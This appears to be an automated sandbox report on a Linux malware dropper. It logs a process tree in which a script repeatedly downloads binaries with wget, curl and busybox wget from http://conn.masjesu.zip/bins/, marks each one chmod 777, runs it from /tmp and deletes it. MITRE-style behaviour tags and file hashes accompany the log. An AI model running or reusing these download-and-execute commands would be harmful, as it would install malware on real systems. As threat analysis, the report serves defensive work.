/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- System Network Configuration Discovery
PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- System Network Configuration Discovery
PID:947
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- System Network Configuration Discovery
PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:954
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:961
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:996
-
-
/bin/chmodchmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:1006
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97